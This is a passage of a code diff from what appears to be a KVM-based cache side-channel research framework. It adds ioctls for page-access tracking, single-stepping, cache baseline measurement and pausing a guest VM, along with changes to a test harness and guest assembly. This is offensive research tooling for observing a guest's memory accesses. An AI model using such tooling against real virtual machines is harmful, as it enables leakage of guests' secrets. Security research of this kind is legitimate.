-cachepc_kvm_poll_event_ioctl(void __user *arg_user)
+cachepc_kvm_track_mode_ioctl(void __user *arg_user)
 {
-	if (!cachepc_events_init)
-		return -EINVAL;
+	struct kvm_vcpu *vcpu;
+	uint32_t mode;
 
-	return cachepc_handle_poll_event_ioctl(arg_user);
-}
+	if (!arg_user) return -EINVAL;
 
-int
-cachepc_kvm_ack_event_ioctl(void __user *arg_user)
-{
-	uint64_t eventid;
+	if (copy_from_user(&mode, arg_user, sizeof(mode)))
+		return -EFAULT;
 
-	if (!arg_user) return -EINVAL;
+	BUG_ON(!main_vm || xa_empty(&main_vm->vcpu_array));
+	vcpu = xa_load(&main_vm->vcpu_array, 0);
 
-	if (!cachepc_events_init)
-		return -EINVAL;
+	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_EXEC);
+	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+	cachepc_untrack_all(vcpu, KVM_PAGE_TRACK_WRITE);
 
-	if (copy_from_user(&eventid, arg_user, sizeof(eventid)))
-		return -EFAULT;
+	cachepc_apic_timer = 0;
+	cachepc_singlestep = false;
+	cachepc_singlestep_reset = false;
 
-	return cachepc_handle_ack_event_ioctl(eventid);
+	switch (mode) {
+	case CPC_TRACK_FULL:
+		cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+		cachepc_singlestep_reset = true;
+		cachepc_track_mode = CPC_TRACK_FULL;
+		break;
+	case CPC_TRACK_EXEC:
+		cachepc_track_all(vcpu, KVM_PAGE_TRACK_EXEC);
+		cachepc_singlestep_reset = true;
+		cachepc_track_mode = CPC_TRACK_EXEC;
+		break;
+	case CPC_TRACK_FAULT_NO_RUN:
+		cachepc_track_all(vcpu, KVM_PAGE_TRACK_ACCESS);
+		cachepc_track_mode = CPC_TRACK_FAULT_NO_RUN;
+		break;
+	default:
+		cachepc_track_mode = CPC_TRACK_NONE;
+		break;
+	}
+
+	return 0;
 }
 
 // int
+// cachepc_kvm_track_page_ioctl(void __user *arg_user)
+// {
+// 	struct cpc_track_config cfg;
+// 	struct kvm_vcpu *vcpu;
+// 
+// 	if (!main_vm || !arg_user) return -EINVAL;
+// 
+// 	if (copy_from_user(&cfg, arg_user, sizeof(cfg)))
+// 		return -EFAULT;
+// 
+// 	if (cfg.mode < 0 || cfg.mode >= KVM_PAGE_TRACK_MAX)
+// 		return -EINVAL;
+// 
+// 	BUG_ON(xa_empty(&main_vm->vcpu_array));
+// 	vcpu = xa_load(&main_vm->vcpu_array, 0);
+// 	if (!cachepc_track_single(vcpu, cfg.gfn, cfg.mode))
+// 		return -EFAULT;
+// 
+// 	return 0;
+// }
+// 
+// int
 // cachepc_kvm_track_range_start_ioctl(void __user *arg_user)
 // {
 // 	if (!arg_user) return -EINVAL;
@@ -701,41 +616,16 @@ cachepc_kvm_ack_event_ioctl(void __user *arg_user)
 // }
 
 int
-cachepc_kvm_vm_pause_ioctl(void __user *arg_user)
+cachepc_kvm_poll_event_ioctl(void __user *arg_user)
 {
-	uint64_t deadline;
-	int err;
-
-	if (!arg_user) return -EINVAL;
-
 	if (!cachepc_events_init)
 		return -EINVAL;
 
-	cachepc_pause_vm = true;
-
-	deadline = ktime_get_ns() + 20000000000ULL; /* 20s in ns */
-	while (true) {
-		write_lock(&cachepc_event_lock);
-		if (cachepc_event_avail) {
-			err = copy_to_user(arg_user, &cachepc_event,
-				sizeof(struct cpc_event));
-			cachepc_event_avail = false;
-			write_unlock(&cachepc_event_lock);
-			return 0;
-		}
-		write_unlock(&cachepc_event_lock);
-		if (ktime_get_ns() > deadline) {
-			CPC_WARN("Timeout waiting for pause event\n");
-			cachepc_pause_vm = false;
-			return -EFAULT;
-		}
-	}
-
-	return err;
+	return cachepc_handle_poll_event_ioctl(arg_user);
 }
 
 int
-cachepc_kvm_vm_resume_ioctl(void __user *arg_user)
+cachepc_kvm_ack_event_ioctl(void __user *arg_user)
 {
 	uint64_t eventid;
@@ -747,11 +637,19 @@ cachepc_kvm_vm_resume_ioctl(void __user *arg_user)
 	if (copy_from_user(&eventid, arg_user, sizeof(eventid)))
 		return -EFAULT;
 
-	cachepc_pause_vm = false;
-
 	return cachepc_handle_ack_event_ioctl(eventid);
 }
 
+int
+cachepc_kvm_req_pause_ioctl(void __user *arg_user)
+{
+	if (arg_user) return -EINVAL;
+
+	cachepc_pause_vm = true;
+
+	return 0;
+}
+
 long
 cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg)
 {
@@ -775,36 +673,28 @@ cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg)
 		return cachepc_kvm_calc_baseline_ioctl(arg_user);
 	case KVM_CPC_APPLY_BASELINE:
 		return cachepc_kvm_apply_baseline_ioctl(arg_user);
-	// case KVM_CPC_SINGLE_STEP:
-	// 	return cachepc_kvm_single_step_ioctl(arg_user);
 	case KVM_CPC_VMSA_READ:
 		return cachepc_kvm_vmsa_read_ioctl(arg_user);
 	case KVM_CPC_SVME_READ:
 		return cachepc_kvm_svme_read_ioctl(arg_user);
-	case KVM_CPC_TRACK_MODE:
-		return cachepc_kvm_track_mode_ioctl(arg_user);
-	// case KVM_CPC_TRACK_PAGE:
-	// 	return cachepc_kvm_track_page_ioctl(arg_user);
-	// case KVM_CPC_TRACK_ALL:
-	// 	return cachepc_kvm_track_all_ioctl(arg_user);
-	// case KVM_CPC_UNTRACK_ALL:
-	// 	return cachepc_kvm_untrack_all_ioctl(arg_user);
 	case KVM_CPC_RESET_TRACKING:
 		return cachepc_kvm_reset_tracking_ioctl(arg_user);
+	case KVM_CPC_TRACK_MODE:
+		return cachepc_kvm_track_mode_ioctl(arg_user);
 	case KVM_CPC_POLL_EVENT:
 		return cachepc_kvm_poll_event_ioctl(arg_user);
 	case KVM_CPC_ACK_EVENT:
		return cachepc_kvm_ack_event_ioctl(arg_user);
+	// case KVM_CPC_TRACK_PAGE:
+	// 	return cachepc_kvm_track_page_ioctl(arg_user);
 	// case KVM_CPC_TRACK_RANGE_START:
 	// 	return cachepc_kvm_track_range_start_ioctl(arg_user);
 	// case KVM_CPC_TRACK_RANGE_END:
 	// 	return cachepc_kvm_track_range_end_ioctl(arg_user);
 	// case KVM_CPC_TRACK_EXEC_CUR:
 	// 	return cachepc_kvm_track_exec_cur_ioctl(arg_user);
-	case KVM_CPC_VM_PAUSE:
-		return cachepc_kvm_vm_pause_ioctl(arg_user);
-	case KVM_CPC_VM_RESUME:
-		return cachepc_kvm_vm_resume_ioctl(arg_user);
+	case KVM_CPC_VM_REQ_PAUSE:
+		return cachepc_kvm_req_pause_ioctl(arg_user);
 	default:
 		return kvm_arch_dev_ioctl(file, ioctl, arg);
 	}
@@ -827,9 +717,9 @@ cachepc_kvm_setup_test(void *p)
 
 	cachepc_kvm_system_setup();
 
-	cachepc_kvm_prime_probe_test(NULL);
+	cachepc_kvm_prime_probe_test();
+	cachepc_kvm_stream_hwpf_test();
 	cachepc_kvm_single_eviction_test(NULL);
-	cachepc_kvm_stream_hwpf_test(NULL);
 
 exit:
 	put_cpu();
@@ -843,10 +733,11 @@ cachepc_kvm_init(void)
 	cachepc_ctx = NULL;
 	cachepc_ds = NULL;
 
-	cachepc_retinst = 0;
 	cachepc_debug = false;
-	cachepc_single_step = false;
+
+	cachepc_retinst = 0;
+	cachepc_singlestep = false;
+	cachepc_singlestep_reset = false;
 	cachepc_track_mode = CPC_TRACK_NONE;
 
 	cachepc_inst_fault_gfn = 0;
diff --git a/cachepc/uapi.h b/cachepc/uapi.h
@@ -33,8 +33,7 @@
 #define KVM_CPC_POLL_EVENT _IOWR(KVMIO, 0x48, struct cpc_event)
 #define KVM_CPC_ACK_EVENT _IOWR(KVMIO, 0x49, __u64)
 
-#define KVM_CPC_VM_PAUSE _IO(KVMIO, 0x50)
-#define KVM_CPC_VM_RESUME _IO(KVMIO, 0x51)
+#define KVM_CPC_VM_REQ_PAUSE _IO(KVMIO, 0x50)
 
 enum {
 	CPC_EVENT_NONE,
@@ -51,6 +50,7 @@ enum {
 
 enum {
 	CPC_TRACK_NONE,
+	CPC_TRACK_FAULT_NO_RUN,
 	CPC_TRACK_EXEC,
 	CPC_TRACK_FULL,
 };
diff --git a/test/kvm-step.c b/test/kvm-step.c
@@ -112,15 +112,20 @@ main(int argc, const char **argv)
 
 		printf("VM start\n");
 
-		ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
-		if (ret < 0) err(1, "KVM_RUN");
+		do {
+			ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
+			if (ret < 0) err(1, "KVM_RUN");
+
+			if (kvm.run->exit_reason == KVM_EXIT_HLT)
+				printf("VM halt\n");
+		} while (kvm.run->exit_reason == KVM_EXIT_HLT);
 
 		printf("VM exit\n");
 	} else {
 		pin_process(0, SECONDARY_CORE, true);
 
-		/* single step and log all accessed pages */
-		arg = CPC_TRACK_FULL;
+		/* capture baseline by just letting it fault over and over */
+		arg = CPC_TRACK_FAULT_NO_RUN;
 		ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg);
 		if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE");
@@ -133,12 +138,24 @@ main(int argc, const char **argv)
 
 		/* run vm while baseline is calculated */
 		eventcnt = 0;
-		while (eventcnt < 30) {
+		while (eventcnt < 50) {
 			eventcnt += monitor(&kvm, true);
 		}
 
-		ret = ioctl(kvm_dev, KVM_CPC_VM_PAUSE, &event);
-		if (ret) err(1, "ioctl KVM_CPC_VM_PAUSE");
+		ret = ioctl(kvm_dev, KVM_CPC_VM_REQ_PAUSE);
+		if (ret) err(1, "ioctl KVM_CPC_VM_REQ_PAUSE");
+
+		while (1) {
+			ret = ioctl(kvm_dev, KVM_CPC_POLL_EVENT, &event);
+			if (ret && errno == EAGAIN) continue;
+			if (ret) err(1, "ioctl KVM_CPC_POLL_EVENT");
+
+			if (event.type == CPC_EVENT_PAUSE) break;
+
+			printf("Skipping non-pause event..\n");
+			ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
+			if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
+		}
 
 		arg = false;
 		ret = ioctl(kvm_dev, KVM_CPC_CALC_BASELINE, &arg);
@@ -151,17 +168,22 @@ main(int argc, const char **argv)
 		print_counts(baseline);
 		printf("\n");
 		print_counts_raw(baseline);
-		printf("\n");
+		printf("\n\n");
 
 		arg = true;
 		ret = ioctl(kvm_dev, KVM_CPC_APPLY_BASELINE, &arg);
 		if (ret) err(1, "ioctl KMV_CPC_APPLY_BASELINE");
 
-		ret = ioctl(kvm_dev, KVM_CPC_VM_RESUME, &event.id);
-		if (ret) err(1, "ioctl KVM_CPC_VM_RESUME");
+		/* single step and log all accessed pages */
+		arg = CPC_TRACK_FULL;
+		ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg);
+		if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE");
+
+		ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
+		if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
 
 		eventcnt = 0;
-		while (eventcnt < 30) {
+		while (eventcnt < 50) {
 			eventcnt += monitor(&kvm, false);
 		}
diff --git a/test/kvm-step_guest.S b/test/kvm-step_guest.S
@@ -6,13 +6,17 @@
 .global guest_stop
 
 guest_start:
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
-	mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
+	mov $(L1_LINESIZE * (L1_SETS + 9)), %rbx
+#	hlt
+#	mov $(L1_LINESIZE * (L1_SETS + 10)), %rbx
+	mov $(L1_LINESIZE * (L1_SETS + 11)), %rbx
+#	hlt
+#	mov $(L1_LINESIZE * (L1_SETS + 12)), %rbx
	mov $(L1_LINESIZE * (L1_SETS + 13)), %rbx
+#	hlt
+#	mov $(L1_LINESIZE * (L1_SETS + 14)), %rbx
+	mov $(L1_LINESIZE * (L1_SETS + 15)), %rbx
+	hlt
 	jmp guest_start
 
 guest_stop: